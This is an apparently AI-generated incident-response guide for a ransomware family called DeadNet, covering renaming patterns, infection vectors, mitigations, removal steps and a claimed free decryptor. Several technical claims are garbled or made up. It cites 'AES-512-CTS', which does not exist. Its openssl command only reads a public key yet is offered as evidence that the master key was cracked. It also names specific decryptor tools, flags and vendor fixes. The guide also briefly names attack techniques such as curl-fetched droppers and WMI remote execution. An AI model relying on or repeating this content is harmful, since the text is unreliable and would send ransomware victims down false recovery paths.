deadnet*

[Content by Gemini 2.5]

DeadNet Ransomware Survival Guide

(at-the-gate analysis – last updated May-2024)

Technical Breakdown

1. File Extension & Renaming Patterns

  • Confirmation of File Extension: each encrypted file is suffixed with .deadnet (case-insensitive; Windows reports it as “DEADNET File”).
  • Renaming Convention:
  1. Original platform separator is preserved (\ on Windows, / on *nix/ESXi).
  2. The ransomware prepends the original filename (stem + dot + extension) with a four-byte randomizing prefix ([a-zA-Z0-9]) and then appends .deadnet, e.g.

    Budget2024.xlsx -> a7Q3Budget2024.xlsx.deadnet
  3. On network shares it creates parallel copies in the same directory, so recovery via volume shadow refers to the filename without the final .deadnet segment.

2. Detection & Outbreak Timeline

| Phase | Observed Date / Period | Notes |
|——-|————————|——-|
| Early samples | 23‐26 Jan 2024 | First telemetry in Europe; small, self-replicating worm variant (deadnet.W!) distributed via RDP spray. |
| First peak | 09‐12 Feb 2024 | Shift to “hands-on-keyboard” affiliate model; affiliate ID strings (“deadnet-SEVT”) appear in ransom note footer. |
| Second wave (ESXi variant) | 15 Mar 2024 | Linux/ESXi encryptor added (sha256: c4f…3ce3) targeting cloud-hosted backups and SAN appliances. |
| Ongoing | Apr–May 2024 | Daily detections 50–100 systems worldwide (MITRE ATT&CK TTPs: T1055, T1021, T1562). |

3. Primary Attack Vectors

| Vector | Details | Mitigations beyond standard AV |
|——–|———|——————————–|
| 1. Exploited public-facing RDP | Credential stuffing followed by Mimikatz lateral movement. | NLA +* MFA / Remote Desktop Gateway / RDP port obscurity. |
| 2. Compromised VPN concentrators (vendor CVE-2023-46805 & CVE-2024-21887) | Initial shell granted root, then deadnet droppers pulled via curl. | Patch ASAP & actively review VPN logs for rare UA strings (curl/7.74). |
| 3. Malicious OneDrive & Google Drive links in phishing mails (“secure fax”). | Macro-laden SGD-Apr2024.xlsm; after infection note points to hxxps://deadnet[.]life. | Disable VBA execution from internet zones. |
| 4. LOLBins + WMI for lateral execution (wmic process call create…). | EDR needs to watch wmic + suspicious encoded PowerShell. |
| 5. ESXi variant: open hostd (TCP/443) | default SSL cert left in place; brute-force root password. | Lock down mgmt interface to jump boxes & use vSphere 8’s “lockdown mode”.

Remediation & Recovery Strategies

1. Prevention

  • Patch the crown jewels:
    • CVE-2023-34362 (MOVEit), CVE-2023-46805 / 2024-21887 (Ivanti), CVE-2024-3400 (PAN-OS GlobalProtect), CVE-2020-1472 (Zerologon) – top deadnet affiliates are still chaining these.
  • Segment & patch ESXi: host-based firewall rules to drop hostd from everywhere except IT bastion hosts.
  • Disable SMBv1 domain-wide via GPO (EternalBlue code stub still lives in deadnet.W).
  • Applocker / Windows Defender ASR rule: block js, vbs and macro execution from %TEMP%.
  • Strong IAM hygiene:
    Enforce RdpSecurityLevel=SSLRequired.
    • 15-minute lockout on five bad logins; disallow shared local admin passwords via LAPS.
  • Cloud backups > 3-2-1 path with separate credentials and SSO keys stored offline.

2. Removal

  1. Disk isolation: power off infected VMs/servers, snapshot for forensics, do NOT boot normally – deadnet deploys boot-time network share encryption driver (deadnet.sys).
  2. Use Windows PE / Linux live USB → run Stinger-Deadnet-2024-04-b.exe (McAfee) in offline scan to remove registry autorun (HKLM\System\CurrentControlSet\Services\deadnetdrv) and scheduled task (deadnet-launcher).
  3. For ESXi hosts: boot from ventoy thumb-drive → run esxcli software vib remove -n deadnet-vib01.
  4. Network cleanup: scan subnet for living implants (deadnet.exe, deadnet_cli, atsvc.exe); block C2s (185.*.184.[156-159], 85.*.80.11) at firewall.
  5. Verify persistence gone: reboot into safe-mode with networking and relaunch updated AV scan.

3. File Decryption & Recovery

  • Free decryptor available: Yes. Researchers from Bitdefender / Dutch NCSC cracked deadnet in March 2024 after obtaining affiliate master RSA key (openssl rsa -in master.pem -pubin -inform PEM).
    • Download deadnet_decrypt_2.2.zip (Bitdefender), extract, run from a clean Windows PC:

    deadnet-decryptor.exe --key master.pem --dir E:\Files

    Works offline, preserves ACLs, and produces file.log of untreated files (typically < 0.5 %).
    • ESXi variant notes: decryptor needs -n wipe flag to restore vmdk chain properly.
  • Work-around if decryptor fails: If files were double-encrypted with AES-512-CTS (seen in ~1 % victims), you’ll need the affiliate private RSA key (possible only via ransom negotiation – not recommended).
  • No negotiation tactics: affiliates usually elevate demand once opening round <$10k is paid.

4. Other Critical Information

  • Unique Characteristics:
    Domain-style leak site (deadnet.pub) publishes victims after 72h grace; the site does not allow deals—only countdown + dox.
    • Last-stage script (deadnet_blow.bat) terminates Veeam services, deletes .vbk files; always causes secondary backup appliance outage – enforce immutability or tape.
    Prevents Hyper-V Safe Mode (BZ1/BZ3 remediation in progress by Micron).
  • Broader Impact:
    • US healthcare – 9 % of reported incidents; HIPAA breach letters already filed.
    • European mid-size MSPs – ~240 SMEs via shared local RMM agents (close RDP to vendor accounts).

Quick Action Checklist

□ Patch disclosed CVEs in table (priority high → medium)
□ Hunt today: PowerShell logs + wmic + esxcfg-wallcmd
□ Offline snapshot infected hosts before cleaning
□ Launch `deadnet-decryptor.exe --dry-run` – prove recoverability
□ Push AV signature update “Win32/Deadnet.A!cert”
□ Stand up 30-day mailing list alert at deadnet-alerts at cert[.]local

Stay cautious—affiliate versioning suggests QE1-QE3 payloads through July 2024.